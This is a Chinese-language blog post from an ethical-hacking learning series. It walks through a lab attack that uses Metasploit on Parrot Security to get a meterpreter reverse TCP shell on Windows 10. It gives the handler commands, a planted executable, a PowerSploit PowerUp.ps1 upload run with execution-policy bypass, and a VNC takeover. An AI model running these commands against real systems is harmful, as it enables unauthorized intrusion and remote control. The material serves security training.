iT邦幫忙

2021 iThome 鐵人賽

DAY 14
0
Security

Certificated Ethical Hacker菜雞上路系列 第 14

Day14:今天我們來聊一下如何使用Parrot Security上的meterpreter來進行system hacking

  • 分享至 

  • xImage
  •  

今天我們從攻擊者的角度來看如何透過作業系統的漏洞,利用攻擊目標,

使用Metasploit建立未經授權的VNC Sessions並進行遠端控制

登入Parrot Security主機,開啟KDE Terminal,輸入sudo su切換身份

輸入cd切換目録,執行以下指令

https://ithelp.ithome.com.tw/upload/images/20210928/20112182gNpDJnOaMT.png

輸入指令msfconsole啟動Metasploit framework,並輸入use exploit/multi/handler

https://ithelp.ithome.com.tw/upload/images/20210928/20112182bC4NX8ZDA0.png

建立網站虛擬目録share,並將剛才產生的Test.exe置於目録

https://ithelp.ithome.com.tw/upload/images/20210928/20112182vWihFnmLCq.png

輸入以下指令

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.134.133

set LPORT 444

exploit

https://ithelp.ithome.com.tw/upload/images/20210928/201121820ifAStPHVm.png

在Windows 10連上網站,不小心下載到Test.exe並執行

https://ithelp.ithome.com.tw/upload/images/20210928/20112182XzdqdrZ1At.png

記得將Windows 10的防毒及威脅保護暫時關閉,否則Test.exe無法執行

https://ithelp.ithome.com.tw/upload/images/20210928/20112182UFThtP2CWd.png

然後從msfconsole可以看到Windows 10已經連上

https://ithelp.ithome.com.tw/upload/images/20210928/20112182AgYWosejFw.png

輸入sysinfo可以從遠端看到Windows 10的Build版本

https://ithelp.ithome.com.tw/upload/images/20210928/20112182HHlKs0Y3eS.png

使用以下指令下載PowerSploit

git clone https://github.com/PowerShellMafia/PowerSploit 

執行以下指令將PowerUp.ps1檔案上傳到Windows 10

upload /root/PowerSploit/Privesc/PowerUp.ps1 PowerUp.ps1 

https://ithelp.ithome.com.tw/upload/images/20210929/20112182Hdtj3IiN3v.png

執行以下指令

powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks"

https://ithelp.ithome.com.tw/upload/images/20210929/20112182E3B15wD3QR.png

輸入以下指令run vnc進行Windows 10的VNC連線

https://ithelp.ithome.com.tw/upload/images/20210929/20112182pqN9YknGY4.png


上一篇
Day13:今天來聊一下Parrot Security上的CGI scanner Nikto
下一篇
Day15:今天我們來聊一下使用Parrot Security的 Armitage來取得遠端系統的存取(Gain Access)權
系列文
Certificated Ethical Hacker菜雞上路30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言